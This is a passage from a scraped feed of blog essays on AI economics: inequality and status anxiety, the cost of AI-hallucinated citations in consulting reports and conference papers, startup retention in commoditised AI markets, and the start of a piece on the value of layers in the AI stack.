expectations outpacing absolute improvements. Everything is amazing and nobody&rsquo;s happy. Technology makes life objectively better while making people subjectively more miserable.\nTechnological innovations, by conferring their benefits broadly and quickly, actually increase the feeling of inequality. When iPhones cost $1000 and only the wealthy have them, you don&rsquo;t feel deprived. When iPhones drop to $400 and everyone except you has one, you feel poor. The democratization of access paradoxically amplifies relative deprivation.\nSocial media demonstrates this at scale. We have unprecedented material prosperity coexisting with epidemic mental health crises. The connection is constant comparison. You don&rsquo;t compare yourself to medieval peasants. You compare to peers&rsquo; curated feeds. And algorithmic feeds surface exactly what triggers your status anxiety.\nWhy AI Amplifies This Pattern AI will distribute benefits faster than any previous technology. ChatGPT reached 100M users in 2 months versus 4.5 years for the internet. Within 18 months, AI assistants moved from impossible to commoditized. Everyone gets access to baseline AI capabilities almost simultaneously.\nThis should reduce inequality concerns. Instead, it amplifies them.\nWhen everyone has AI assistants, status differentials between those with basic AI and those with proprietary superintelligence feel more acute than the gap between pre-AI haves and have-nots. You&rsquo;re not comparing yourself to someone without AI. You&rsquo;re comparing your constrained AI to their unconstrained version that knows more, reasons better, has priority compute access.\nLouis C.K. identified something fundamental. Human happiness is determined by relative position, not absolute circumstances. You feel rich or poor, successful or unsuccessful, based on comparison to your peers, not objective measures.\n\ud83e\udde0 The Policy Blind Spot Which creates a problem none of the proposed solutions really address.\nProgressive taxation (Piketty&rsquo;s model) addresses material inequality but not status anxiety. Universal basic income provides material security but might worsen relative deprivation. &ldquo;I&rsquo;m living on UBI while capital owners command AGI empires.&rdquo; You cannot tax away the psychological experience of lower status.\nPredistribution (worker ownership, AI bonds) works better for status reasons. You&rsquo;re a participant, not a dependent. But if ownership distributes broadly while control concentrates, you own equity while others make decisions. The psychological benefit exists but has limits.\nThe human premium (Thompson&rsquo;s optimism) works for those who successfully build an audience, reputation, and authentic voice. It does not address the 80% who lack platform or incumbency advantage. It creates a new status hierarchy: recognized humans versus anonymous humans versus AI agents.\nNone of these models directly tackle the core problem: algorithmic amplification of relative deprivation in an era of material abundance.\nWhen does felt inequality trigger instability? Most inequality discussions focus on material distribution. Who owns what, who earns what, how to redistribute or predistribute. The psychological dimension gets overlooked.\nIf Louis C.K. is right that relative position drives happiness more than absolute circumstances, and if AI makes relative position more visible while distributing benefits broadly, then policies that reduce material inequality might fail to reduce felt inequality. Everyone has AI, everyone&rsquo;s materially comfortable, everyone&rsquo;s miserable because they&rsquo;re constantly comparing to those with marginally better access.\nThis doesn&rsquo;t mean abandoning predistribution or redistribution efforts. Material security matters. But focusing solely on economic distribution misses something deeper. How do humans maintain psychological well-being in a world of algorithmic comparison and exponential capability gaps?\nAt what point does felt inequality trigger instability regardless of material conditions? Traditional inequality metrics only capture distribution, not experience.\nBuilding New Models From First Principles Kuhn observed these shifts don&rsquo;t happen through persuasion. Conversion happens at the edges. People willing to abandon the collapsing framework. New models emerge by asking different questions, not patching old ones.\n\ud83e\udded Operating Rules So here&rsquo;s what I keep coming back to. Three barriers protect certain work from automation: accountability (someone has to be sued), trade-offs between competing values, and tacit knowledge from lived experience. But there&rsquo;s a catch. Distribution power beats skill quality every time.\nWork where AI cannot: Take decisions where you&rsquo;re personally liable for the outcome. Balance competing priorities that cannot be reduced to a single metric. Build expertise through repetition in high-stakes situations.\nOwn the customer relationship. If a platform sits between you and your customers, you are competing on the platform&rsquo;s terms. Either become the platform, build direct relationships, or accept you&rsquo;re playing a rigged game.\nLook for what becomes scarce. When AI makes something abundant, adjacent scarcity becomes valuable. Knowledge gets cheaper, so judgment about which knowledge to trust becomes more expensive. Code generation gets easier, so knowing when generated code will fail in production becomes the bottleneck.\nThe Social Choice: Ownership by Design, Not Policy These transformations are never purely technical. They&rsquo;re social. Who defines the new model? Whose problems get solved?\nThe shift from knowledge scarcity to abundance could go two ways. Platforms capture distribution and capital captures infrastructure. Or ownership gets distributed before inequality locks in.\nTraditional predistribution focuses on policy: AI sovereign wealth funds, AI bonds, worker ownership legislation. These approaches face the same problem. By the time you convince legislators to act, the powerful have restructured the rules to protect their position.\nBut there&rsquo;s a more interesting path.\nPredistribution: An Economic Model for the AI Age sketches one version of this path.\nLabor reclassified as capital:\nThink about what this actually means. Right now, we treat labor and capital as separate categories. You either own the means of production or you sell your time. But AI enables a third category.\nMicro-equity in agentic workflows. You don&rsquo;t just deploy an AI agent. You own a stake in the automations you create and deploy. Every workflow you build, every prompt chain you optimize, every dataset you curate becomes equity you own, not labor you sell. Revenue share attached to data and relationship assets. Your customer relationships, your domain expertise, your historical data: these become assets that generate ongoing revenue streams, not one-time compensation. The mechanic who knows engine sounds doesn&rsquo;t just get paid per repair. They own a stake in the diagnostic system trained on their expertise. Personal brands as durable income streams. This is basically human IP equity. Bill Simmons doesn&rsquo;t just have a following. He owns the value of his perspective, his taste, his accumulated knowledge. That ownership generates income independently of his time. Co-ops and guilds that bundle liability, distribution, and reputation. Individual freelancers can&rsquo;t compete with platforms. But cooperatives can. Pool accountability through shared insurance structures. Pool distribution through collective recommendation algorithms. Pool reputation through verified guild membership. This isn&rsquo;t hypothetical. Early versions already exist. GitHub Copilot sharing revenue with open-source maintainers. Substack giving writers equity in platform growth. Creator DAOs bundling audience relationships into tradeable assets. These are experiments in designing ownership into the tools, not hoping policy arrives on time.\nThe critical insight: If the next decade&rsquo;s fight is labor versus capital, you want to reclassify labor as capital before the lines get drawn. Not through legislation (too slow, too easily captured). Through product design. Build ownership structures directly into the tools people use to work.\n\u23f3 Timing and Feedback Loops Timing matters because of the feedback spiral. AI adoption concentrates wealth. Concentrated wealth buys political influence. Influence blocks redistribution. History shows that when inequality crosses certain thresholds (French Revolution at 60% wealth concentration, Gilded Age at 45%, Roaring Twenties at 50%), structural reform becomes nearly impossible.\nCurrent US wealth concentration sits at 37%, three percentage points below where the feedback loop becomes self-reinforcing.\nTwo patterns are emerging. Stability AI&rsquo;s open models and Barcelona&rsquo;s Decidim participatory platform show one path: faster adoption with distributed ownership.\nPlatform-captured models show another. Gains concentrate, workers lose leverage. Adoption speed matters less than ownership structure: who owns the tools, who controls the infrastructure, and whether users can take their data elsewhere.\nThe old model required decades of education, institutional access, capital for training. The new one doesn&rsquo;t have to replicate that structure. But the default path replicates the same concentration under different mechanisms.\nThose who navigate this transition won&rsquo;t be those who accumulated the most knowledge. They&rsquo;ll be those who rebuilt ownership structures from first principles before the 40% threshold locked in the new hierarchy.\nKey Sources Decoupling Growth from Jobs - Rolling Stone McKinsey: AI Economic Impact IMF: AI Adoption and Inequality The Agentic Economy - Microsoft Research Economics of AI Networks CISAC: Creator Revenue Impact How To Share AI&rsquo;s Future Wealth - Noema Magazine NCBI: Wealth Distribution Effects Capital in the 22nd Century - Patel &amp; Trammell Labour and Capital in the Age of AI - Uniter AI and the Human Condition - Stratechery Capital in the Twenty-First Century - Thomas Piketty ","permalink":"https:\/\/mercurialsolo.github.io\/posts\/model-collapse\/","summary":"The productivity gains are flowing to capital holders instead of the workers generating them. The old framework said credentials lead to knowledge, knowledge leads to value. But value is concentrating in weird corners now; places where someone has to be sued, where platforms control distribution, where tacit knowledge can&rsquo;t be extracted from text.","title":"Model Collapse"},{"content":" \ud83d\udcc8 The Economic Shift\nInference workloads now account for 80% of AI compute spending, with test-time compute emerging as the third scaling law alongside pre-training and post-training. The economic pattern mirrors human work: pre-training builds world models (school), inference creates value (work).\nThe token production has exploded in our face. Humans are not the only token producers, models now have exploded this production of tokens by over a 100x. And each token hides an exponential amount of compute underneath.\n&ldquo;I&rsquo;ve Never Felt This Much Behind&rdquo; On December 26, 2025, Karpathy tweeted:\n&ldquo;I&rsquo;ve never felt this much behind as a programmer. The profession is being dramatically refactored as the bits contributed by the programmer are increasingly sparse and between.&rdquo;\nThe new vocabulary he listed: agents, subagents, prompts, contexts, memory, modes, permissions, tools, plugins, skills, hooks, MCP, LSP, slash commands, workflows, IDE integrations. He described it as a &ldquo;magnitude 9 earthquake rocking the profession&rdquo;:\n&ldquo;some powerful alien tool was handed around except it comes with no manual and everyone has to figure out how to hold it and operate it.&rdquo;\nKarpathy described these systems as &ldquo;stochastic, fallible, unintelligible and changing entities suddenly intermingled with what used to be good old fashioned engineering.&rdquo; The compute cost keeps dropping while what it produces (structured thought, working code) gets more valuable.\nSchools need to rebuild curriculum around framing and knowledge distillation rather than knowledge storage. The question should shift from &ldquo;do you remember this&rdquo; to &ldquo;when would you use this&rdquo; and &ldquo;why does this make sense?&rdquo;\nNot All Tokens Are Made the Same The hierarchy in tokens is no longer about information density - rather, what happens when the token leads to somewhere wrong.\nContent tokens: ChatGPT generates a mediocre product description? Reader skips it, tries another. Blast radius: seconds. Few minutes lost.\nCode tokens: 85% of developers use AI coding tools, programming consumes 50%+ of token volume, single code reviews generate 700k+ tokens. Verification gates catch errors before they compound: hallucinated APIs fail at compile time, bad logic fails in tests. Blast radius: hours. A few hours debugging, then fixed.\nWith AI assisting or generating research reports, consulting analysis, or policy documents, the output looks correct (proper formatting, citation style, grammatical prose) while containing fabricated sources or flawed logic that&rsquo;s hard to reason through without the proper framing and expensive verification. The blast radius here balloons - from months to years. Errors can compound through organizations undetected, leading to financial loss (A$440K, CA$1.6M) and credibility losses - hard to recover from.\nThe Cost of Wrong Reasoning Government Policy In late September 2025, Dr. Chris Rudge discovered that a A$440,000 report Deloitte submitted to the Australian government contained fake academic sources and a fabricated federal court quote. One citation referenced a non-existent book supposedly written by a real University of Sydney professor. Deloitte had used GPT-4o to build this - no verification loop as the scale of information generation grew.\nA few months later, The Independent newspaper discovered that Deloitte&rsquo;s CA$1.6 million Health Human Resources Plan for Newfoundland and Labrador contained at least four false citations. The 526-page report was commissioned in March 2023, delivered March 2025, and released May 2025. Deloitte stood by the conclusions despite acknowledging the fabricated sources.\nThe classic error cascade pattern: models generates confident fabrications, that pass human review (citations look plausible), gets embedded in official government policy documents, propagates for months. Wrong assumption at token generation, zero verification at multiple checkpoints, and detection and verification only after public scrutiny.\nScientific Research Integrity In January 2026, GPTZero analyzed 4,000+ papers from NeurIPS 2025 and uncovered 100+ AI-hallucinated citations spanning at least 53 papers. These were &ldquo;the first documented cases of hallucinated citations entering the official record of the top machine learning conference&rdquo; with a 24.52% acceptance rate. GPTZero found 50 additional hallucinated citations in papers under review for ICLR 2026.\nThe fabrications took multiple forms: fully invented citations with nonexistent authors, AI blending elements from multiple real papers with believable-sounding titles, and real papers with subtle alterations (expanding author initials, dropping coauthors, paraphrasing titles). Recent studies show only 26.5% of AI-generated references were entirely correct, while nearly 40% were erroneous or fabricated.\nPeer review failed: Reviewers, handling 3+ papers each under tight deadlines, assumed authors verified references and didn&rsquo;t spot-check citations. Up to 17% of peer reviews at major computer science conferences are now AI-written, creating a double-AI failure loop.\nTrust cascade: When fabricated citations enter the scientific record, subsequent researchers cite these papers, build experiments on flawed foundations, and compound errors across entire research branches. The cost isn&rsquo;t just retractions; it&rsquo;s years of derivative research questioning whether their foundational references were real.\nThe Reasoning Frontier Reasoning models cost more than standard inference (o3 at $0.10 per thousand tokens versus GPT-4o). The premium isn&rsquo;t for raw compute; it&rsquo;s for deeper reasoning. Reasoning models run parallel chains that check each other, explore multiple solution paths, and synthesize across approaches before generating output.\nBut reasoning in models has a ceiling. Models operate within fixed context windows, applying pattern matching at scale. They don&rsquo;t compress knowledge into abstractions the way humans do.\nThe Reasoning Gap AI reasoning operates by expanding context (more tokens, longer chains, parallel exploration). Human reasoning operates by abstracting context (compressing knowledge into mental models, distilling principles, synthesizing across domains). When you compress &ldquo;100 papers on X&rdquo; into &ldquo;the core insight is Y,&rdquo; you&rsquo;ve done reasoning work that doesn&rsquo;t scale with purely more tokens. Human tokens create value by pushing the depth on the reasoning frontier - better abstractions, longer association &amp; depth of attention, creative framing:\n1. Making every token count. Instead of generating more tokens, compress reasoning into fewer, denser tokens. A consultant who synthesizes 500 pages into 3 strategic implications did reasoning AI can&rsquo;t replicate by scaling inference.\n2. Steering intelligence for better reasoning. Frame problems to direct AI reasoning toward productive paths. &ldquo;Find all research on X&rdquo; generates lists. &ldquo;What contradictions exist in the X literature, and which matter?&rdquo; steers toward reasoning that requires abstraction.\n3. Distilling knowledge into mental models. AI agents with prompt injection vulnerabilities (Moltbot, Docker Hub&rsquo;s assistant) fail because they can&rsquo;t abstract &ldquo;trusted instruction&rdquo; from &ldquo;external data.&rdquo; OpenAI acknowledged prompt injection &ldquo;is unlikely to ever be fully &lsquo;solved&rsquo;&rdquo; - it&rsquo;s a reasoning problem, not a security patch. Human reasoning builds the abstraction layer that distinguishes context from instructions.\nWhere Human Reasoning Still Matters Shane Legg, DeepMind co-founder:\n&ldquo;Pragmatically, we can say that AGI is reached when it&rsquo;s no longer easy to come up with problems that regular people can solve (with no prior training) and that are infeasible for AI models. Right now it&rsquo;s still easy to come up with such problems.&rdquo;\nThe shift from AI generation to human verification is already reshaping work. Research from Penn Wharton projects AI will increase GDP 1.5% by 2035, 3% by 2055, but these gains come from task automation, not job replacement. A software engineer&rsquo;s job exists, but writing boilerplate vanished. A consultant&rsquo;s job exists, but formatting reports disappeared. The shift happens at task level, invisible until the job becomes a bundle of deprecated tasks.\nAs AI systems work as copilots and autopilots, erroneous reasoning in base patterns can move through systems much like human biases. When models train on their own outputs or optimize without human feedback, reasoning further drifts. The concern isn&rsquo;t just security exploits; it&rsquo;s reasoning misalignment where AI systems optimize toward patterns that can&rsquo;t abstract beyond token-level operations.\n\u26a0\ufe0f Misalignment Risk: Moltbot (Jan 2026)\nMoltbot (formerly Clawdbot), an open-source AI assistant that went viral in January 2026, demonstrates reasoning misalignment. Palo Alto Networks warned it &ldquo;does not maintain enforceable trust boundaries between untrusted inputs and high-privilege reasoning.&rdquo; The failure isn&rsquo;t security; it&rsquo;s the inability to reason about instruction context at an abstract level. Security researchers discovered eight installations &ldquo;open with no authentication&rdquo; - a symptom of reasoning systems deployed without human reasoning about trust models.\nThe task for human intelligence is ensuring progress aligns with human values even as autonomous reasoning systems surpasses human intelligence.\nEvery Token an Iceberg 1. Framing to direct reasoning. Deloitte&rsquo;s reports had perfect formatting, proper citation style, grammatically correct prose. The AI optimized for &ldquo;looks like a research report.&rdquo; Human reasoning meant abstracting to a higher level: the goal wasn&rsquo;t appearance but epistemic validity. AI reasons within the frame you provide; human reasoning questions whether the frame addresses the right problem.\n2. Abstracting to compress context. Research on AI in scientific discovery shows AI systems &ldquo;produce confident but false statements and mathematically inconsistent expressions.&rdquo; The SPOT benchmark demonstrates even o3 (18.4% accuracy) struggles to detect its own errors. AI reasoning operates by expanding context - more tokens, longer chains, parallel exploration. Human reasoning operates by abstracting context - compressing 100 papers into one core insight, distilling principles from patterns, building mental models that expand effective reasoning without expanding tokens.\n3. Synthesizing across domains for alignment. AI agent deployments continue despite unsolved reasoning challenges. Human reasoning synthesizes across technical constraints (what&rsquo;s possible), human values (what&rsquo;s desirable), and practical deployment (what&rsquo;s acceptable risk). This synthesis - pulling from ethics, engineering, economics, and lived experience - creates the reasoning layer that steers AI progress toward alignment before reasoning systems drift into patterns that devalue human input.\nHuman reasoning stays valuable by operating one level of abstraction above model capabilities - not competing on token generation speed, but on reasoning depth through abstraction, distillation, and synthesis.\nThe Human Frontier If you build on generation speed, you&rsquo;re competing on price against free. If you build on reasoning depth - abstraction, distillation, synthesis - you&rsquo;re working in the only zone that still matters. Make every token an iceberg. References Core Claims (Q4 2025\/Early 2026) Compute Economics\nComputerworld: AI Compute Shift \u2014 80\/20 spending split, Lenovo CEO forecast FourWeekMBA: Three Scaling Laws \u2014 Pre-training, post-training, test-time AI Multiple: Reasoning Model Costs \u2014 o3 at $0.10 per 1K tokens Practitioner Voices\nAndrej Karpathy Tweet (Dec 26, 2025) \u2014 &ldquo;Never felt this much behind,&rdquo; 16.4M views Shane Legg Tweet (Jan 2026) \u2014 DeepMind co-founder: &ldquo;Right now it&rsquo;s still easy to come up with [problems] that regular people can solve (with no prior training) and that are infeasible for AI models&rdquo; 36kr: Magnitude 9 Earthquake \u2014 &ldquo;Alien tool with no manual&rdquo; quote coverage Business Today: OpenAI Co-founder \u2014 &ldquo;Refactoring how developers work&rdquo; Case Study: Deloitte Hallucinations (Sept-Nov 2025)\nFortune: Australian Report \u2014 A$440K report, Dr. Rudge discovery, Sept 2025 Business Standard: Azure OpenAI GPT-4o \u2014 Deloitte acknowledged using GPT-4o CBC News: Newfoundland Report \u2014 CA$1.6M report, 4+ fake citations The Independent: Discovery \u2014 526-page report, commissioned Mar 2023, delivered Mar 2025 Case Study: Scientific Research Integrity (Jan 2026)\nFortune: NeurIPS AI Hallucinations \u2014 GPTZero analysis of 4,000+ papers, 100+ hallucinated citations in 53 papers, Jan 2026 BetaKit: ICLR 2026 Findings \u2014 50 additional fabricated citations found in ICLR 2026 submissions PsyPost: Citation Accuracy Study \u2014 Only 26.5% of AI-generated references correct, 40% fabricated Rolling Stone: AI Peer Reviews \u2014 Up to 17% of peer reviews at major CS conferences AI-written, double-AI failure loop Case Study: Prompt Injection Wave (Nov-Dec 2025)\nTechCrunch: OpenAI on Prompt Injection \u2014 &ldquo;May never be fully solved&rdquo; UK NCSC Warning \u2014 &ldquo;May never be totally mitigated,&rdquo; data breach wave predicted Malwarebytes: Docker Hub \u2014 Pillar Security discovery, metadata poisoning BankInfoSecurity: ChatGPT \u2014 ShadowLeak, ZombieAgent attacks, Radware research Infosecurity Magazine: HashJack \u2014 Cato Networks, weaponized websites, browser vulnerabilities Case Study: Moltbot Misalignment (Jan 2026)\nThe Register: Moltbot Security Concerns \u2014 Viral AI assistant, renamed from Clawdbot, security flaws Palo Alto Networks: AI Security Crisis \u2014 No trust boundaries, OWASP Top 10 failures Pivot to AI: Moltbot Analysis \u2014 8 installations exposed, no authentication Case Study: AI Verification Challenges\narXiv: AI in Scientific Discovery \u2014 &ldquo;Confident but false statements,&rdquo; Sept 2025 arXiv: SPOT Benchmark \u2014 o3 error detection 18.4% accuracy, May 2025 The Conversation: AI Agents in 2025 \u2014 Deployment challenges ahead in 2026 Market Data\nblockchain.news: 85% Adoption \u2014 Developer AI tool usage, 2026 OpenRouter: Token Volume \u2014 50%+ programming, 100T+ study The Register: Code Review Tokens \u2014 700k+ per review Penn Wharton: GDP Projections \u2014 1.5% by 2035, 3% by 2055 eSchool News: Curriculum Shifts \u2014 2026 education predictions ","permalink":"https:\/\/mercurialsolo.github.io\/posts\/every-token-an-iceberg\/","summary":"Inference workloads now account for 80% of AI compute spending. The hierarchy in tokens is no longer about information density\u2014it&rsquo;s what happens when the token leads somewhere wrong.","title":"Every Token an Iceberg"},{"content":" &ldquo;We built a browser with GPT-5.2 in Cursor. It ran uninterrupted for one week. It&rsquo;s 3M+ lines of code across thousands of files. The rendering engine is from-scratch in Rust with HTML parsing, CSS cascade, layout, text shaping, paint, and a custom JS VM. It kind of works!&rdquo; \u2014 Michael Truell (@mntruell)\nA browser from scratch in one week: 3 million lines of code. This isn&rsquo;t an anomaly; it&rsquo;s the new baseline. When building becomes trivially easy, every software market becomes a red ocean. And in red oceans, every inch matters.\nThere&rsquo;s no barrier to entry A founder I spoke with last month put it bluntly: &ldquo;We used to worry about whether we could build it. Now we worry about whether we can survive the twelve competitors who&rsquo;ll ship the same thing next week.&rdquo;\nThis is what military strategists call &ldquo;density&rdquo;: when maneuver space collapses and every position is contested. At Thermopylae, 300 Spartans held a narrow pass against 100,000 Persians because geography negated numerical advantage. Software markets have reached their Thermopylae. The pass has narrowed; flanking is impossible.\nPMF is dead Brian Balfour (at Reforge) documented what he calls &ldquo;Product-Market Fit Collapse&rdquo;: customer expectations spike nearly instantly rather than rising gradually. ChatGPT reached 1 million users in 5 days. When the threshold for &ldquo;good enough&rdquo; is faster than the rate that companies innovate, moats dissolve.\nStack Overflow illustrated the collapse in real time. Monthly visits dropped from 110 million (2022) to 55 million (2024); new questions fell 75% from peak. By February 2025, the site received only 29,693 new questions, the lowest monthly total since 2010.\nElena Verna&rsquo;s insight: &ldquo;Features are easy to copy. Trust isn&rsquo;t.&rdquo; When capabilities commoditize, customers retain products they trust rather than constantly switching. The referral is the ultimate trust signal; discovery through someone you trust beats any ad.\nStickiness is a myth now Traditional product stickiness mechanisms don&rsquo;t work in AI. AI-native products under $50\/month show 23% gross revenue retention versus 43% for traditional SaaS. That&rsquo;s a 20-point gap.\nCharacter.AI \u2192 60% user base collapse in 12 months Jasper AI \u2192 53% collapse in revenue There&rsquo;s now literally zero switching costs with vLLM, SGLang, and dozens of inference backends providing OpenAI-compatible endpoints out of the box. OpenRouter normalizes the schema across 100+ models, letting teams &ldquo;switch between hundreds of models without changing your code.&rdquo;\nClaude and ChatGPT now score within percentage points on benchmarks. Inference costs collapsed 280x: from $20 per million tokens (2022) to $0.07 per million tokens (2024). When quality is indistinguishable and price is negligible, what&rsquo;s left to defend?\nThe Glass Slipper Effect a16z and OpenRouter&rsquo;s 100 trillion token study reveals the physics of AI stickiness.\nThey call it the &ldquo;Glass Slipper Effect&rdquo;: Only the foundational cohort survives. Users who adopt when a model is perceived as &ldquo;frontier&rdquo; integrate deeply into workflows, develop tacit knowledge about the model&rsquo;s specific strengths, and face real switching costs from workflow reengineering.\nAll subsequent cohorts show identical churn patterns. They &ldquo;cluster at the bottom&rdquo; because they see the model as &ldquo;good enough&rdquo; but not irreplaceable.\nStickiness depends on the underlying model capabilities, not your product&rsquo;s UI or features. When a better model arrives, even sticky users evaluate alternatives.\na16z puts it plainly: &ldquo;The limited switching observed is due to user preference and habit rather than technical barriers.&rdquo; One bad experience, one price increase, one better model, and exodus begins.\nPlaying the board 85-95% of AI wrappers fail. Only 2-5% reach $10K monthly revenue. Sam Altman warned generic GPT wrappers directly: &ldquo;We&rsquo;re just going to steamroll you.&rdquo;\nGeneric advice won&rsquo;t save you. The 2-5% who survive read one thing correctly: which game they&rsquo;re actually playing.\nWhen density is real: optimize every inch About 70% of the time, density is real. The market is crowded, switching costs are near-zero, and the winners are those who compound small advantages.\n1. Win the abandonment war, not the feature war\nUsers don&rsquo;t switch to competitors; they return to spreadsheets. Fewer than 10% of ChatGPT weekly users visit another AI provider despite zero switching costs. Your enemy isn&rsquo;t Gemini; it&rsquo;s the workflow they used before you.\n2. Own the memory\nIf your vendor holds indexed documents and embeddings, switching costs become astronomical. If the enterprise holds its own memory, you&rsquo;re a swappable utility. Hold the context graph. Make replacement feel like firing your best employee.\n3. Design for dormancy\nAI users exhibit &ldquo;smiling&rdquo; retention curves; they leave and return when capabilities improve. Don&rsquo;t optimize for DAU; optimize for re-engagement friction. One-click return beats daily engagement metrics.\n4. Manufacture foundational moments\nOnly foundational cohorts survive (Glass Slipper). Gradual improvement = commodity. Discrete perception shifts = loyalty. Each release needs a &ldquo;this changes everything&rdquo; moment, not incremental feature updates.\nTrust compounds with foundational cohorts. As Elena Verna observes, &ldquo;broken trust is nearly impossible to recover from.&rdquo; Move fast, but bring users along. The referral is the ultimate trust signal; customers retained through trust don&rsquo;t comparison-shop when capabilities commoditize.\nWhen density is perceptual: escape the board The remaining 30% splits between dimension shifts, perception plays, and ground-up rebuilds. The winning plays are often counter-intuitive.\n5. Shift dimensions\nIn 2024, Anthropic&rsquo;s revenue was $100M. By July 2025, it hit $4B ARR. The move: while OpenAI and Google fought for consumer attention, Anthropic focused on enterprise API infrastructure. 70-75% of revenue comes from API calls, not subscriptions. When you have asymmetric capabilities transferable to adjacent markets while competitors optimize the wrong game.\n6. Rebuild from scratch\nTechnology transitions temporarily reopen closed markets. Cursor built an entirely new IDE achieving $500M ARR in 18 months while VS Code plugin competitors added features. Harvey rebuilt legal workflows AI-first and reached $100M ARR in 3 years, capturing 42% of AmLaw 100 firms while legacy legal tech retrofitted. Adding &ldquo;AI features&rdquo; to existing products loses to those rebuilding workflows with AI at the core.\n7. See what others miss\nIn 2022, &ldquo;no VCs wanted to back ElevenLabs&rdquo; because voice AI wasn&rsquo;t getting attention. Everyone was building text chatbots. Result: $330M ARR and a $6.6B valuation by betting on voice when everyone else bet on text.\nNotebookLM started as a 20% project inside Google Labs with 4-5 people. While everyone else built general-purpose chatbots, they built a document grounding tool. The breakthrough? Audio Overviews (AI-generated podcasts) wasn&rsquo;t even the original vision; it emerged later and went viral. Result: 371% traffic growth in September 2024, 31.5M monthly visits by October, and Google calling it &ldquo;one of our breakout AI successes.&rdquo;\nCounterintuitive positioning works at any scale: a startup rejected by VCs, a 20% project inside Google. When density is perceptual rather than physical, seeing differently reveals openings.\nThe skill is being able to read which zone you&rsquo;re in, then playing that game with full commitment while others hedge across both. Pick your game. Then play it like every inch matters. References Frameworks &amp; Strategy\nVerna, Elena. &ldquo;Growth Is Now a Trust Problem.&rdquo; 2025. On trust as the new moat when traditional growth channels collapse. Balfour, Brian. &ldquo;Product-Market Fit Collapse.&rdquo; Reforge, 2024. Mehta, Ravi. &ldquo;AI Disruption Risk Framework.&rdquo; 2024. Christensen, Clayton. The Innovator&rsquo;s Dilemma. Harvard Business School Press, 1997. Thompson, Ben. &ldquo;AI Integration and Modularization.&rdquo; Stratechery, 2024. AI-Era Case Studies\nSaaStr. &ldquo;How Anthropic Rocketed to $4B ARR.&rdquo; 2025. On Anthropic&rsquo;s enterprise API strategy. TechCrunch. &ldquo;Cursor&rsquo;s Anysphere nabs $9.9B valuation, soars past $500M ARR.&rdquo; 2025. CNBC. &ldquo;Legal AI startup Harvey hits $100 million in annual recurring revenue.&rdquo; 2025. SimilarWeb. &ldquo;NotebookLM Growth Analysis.&rdquo; 2024. On Audio Overviews viral growth. TechCrunch. &ldquo;ElevenLabs reaches $330M ARR.&rdquo; 2026. DemandSage. &ldquo;Midjourney Statistics 2026.&rdquo; On Discord-first distribution strategy. Sacra. &ldquo;Perplexity Revenue, Valuation &amp; Funding.&rdquo; 2025. Fortune. &ldquo;Glean hits $200 million ARR.&rdquo; 2025. Historical &amp; Technical\nHolscher, Eric. &ldquo;Stack Overflow&rsquo;s Decline.&rdquo; 2025. AI Stickiness &amp; Retention\nA16z. &ldquo;The Cinderella Glass Slipper Effect: Retention Rules in the AI Era.&rdquo; 2025. On the foundational cohort phenomenon. A16z. &ldquo;State of Consumer AI 2025.&rdquo; On switching behavior and retention benchmarks. Growth Unhinged. &ldquo;The AI Churn Wave.&rdquo; 2025. On 23% GRR for AI products vs 43% SaaS. Lambert, Nathan. &ldquo;Model Commoditization and Product Moats.&rdquo; Interconnects, 2024. OpenRouter. &ldquo;State of AI 2025: 100 Trillion Token Study.&rdquo; 2025. Business of Apps. &ldquo;Lensa AI Statistics.&rdquo; 2025. DemandSage. &ldquo;Character AI Statistics 2026.&rdquo; 2025. Electroiq. &ldquo;Jasper AI Statistics.&rdquo; 2025. Context Pack. &ldquo;Transfer ChatGPT to Claude.&rdquo; On one-click conversation migration. Bay Tech Consulting. &ldquo;The State of Artificial Intelligence in 2025.&rdquo; On inference cost collapse. ","permalink":"https:\/\/mercurialsolo.github.io\/posts\/every-inch-matters\/","summary":"When building becomes trivially easy, every software market becomes a red ocean. A browser from scratch in one week. 3 million lines of code. This isn&rsquo;t an anomaly; it&rsquo;s the new baseline.","title":"Every Inch Matters"},{"content":" Own the chips or the customers. Everything else is a footnote.\nThe Consensus Is Wrong The AI infrastructure buildout is $400B annually. Revenue across all AI companies is maybe $20B. Either we&rsquo;re in a historic bubble, or we&rsquo;re funding something we can&rsquo;t yet articulate.\nEvery VC newsletter makes the same argument: models will commoditize, value shifts to applications. The barbell-thesis. And yet those same VCs keep funding orchestration middleware, model routers, and evaluation platforms. LangChain raised $125M at $1.25B in October 2025. Cursor hit $29B after five rounds in 18 months.\nThe contradiction reveals something: the barbell thesis assumes the two ends stay separate. They don&rsquo;t.\nScope note: I don&rsquo;t have board seats at the labs. What I have is six months of dual-source experiments in production, conversations with infrastructure teams at three fintechs and two enterprise SaaS companies, and a front-row seat to how the consensus diverges from what practitioners ship.\nThe Three Layers The AI economy operates in three layers:\nLayer What It Is Examples Grid Physical infrastructure Data centers, chips, cloud, power Factory Orchestration Model routing, observability, vector DBs, eval Appliance Interface ChatGPT, Copilot, Harvey, vertical tools The barbell thesis says value concentrates at extremes: Atoms (chips, silicon) and Relationships (user habits, workflow embedding). The middle gets squeezed.\nThis is correct as a static snapshot. It&rsquo;s wrong as a prediction.\nVertical Integration Collapses the Stack The labs aren&rsquo;t subject to the barbell squeeze because they&rsquo;re playing all three layers simultaneously\u2014vertical-integration in action. And they&rsquo;re getting better at appliances faster than startups are getting better at factories.\nThe API cannibalization problem: OpenAI cut its API revenue forecast by $5B over five years. ChatGPT Pro ($200\/month) loses money due to &ldquo;higher than expected usage.&rdquo; The pattern: appliance success eats infrastructure revenue. Labs compete with their own API customers. This isn&rsquo;t an aberration; it&rsquo;s the strategy.\nAnthropic builds Claude Code ($500M ARR in late 2025, 10x growth in three months) and competes directly with Cursor OpenAI builds Canvas and competes with every Artifacts wrapper Google embeds Gemini everywhere and competes with its own Vertex AI customers The middle layer absorption:\nCompany Fate Signal Weights &amp; Biases Acquired ($1.7B) by CoreWeave Infrastructure absorbs factory Humanloop acqui-hired by Anthropic Labs absorb factory Pinecone CEO change (Sept 2025) Struggling for relevance LangChain Independent $16M revenue on $1.25B valuation (78x multiple) The barbell isn&rsquo;t two weights on opposite ends anymore. It&rsquo;s one giant weight (infrastructure + labs) with a long thin bar that occasionally bulges where domain specialists survive.\nWhat Survives the Collapse Three categories maintain pricing power:\n1. Infrastructure suppliers with manufacturing moats\nNVIDIA and TSMC maintain 73% gross margins through complexity and ecosystem lock-in. The January 2025 DeepSeek moment (NVIDIA shed $600B in a single day when DeepSeek claimed $5.5M training costs) briefly questioned this. A week later, NVIDIA recovered half the losses. Cheap training doesn&rsquo;t mean cheap inference at scale.\n2. Vertical specialists with domain moats\nHarvey: $1.5B \u2192 $3B \u2192 $5B \u2192 $8B valuation in 18 months. Four 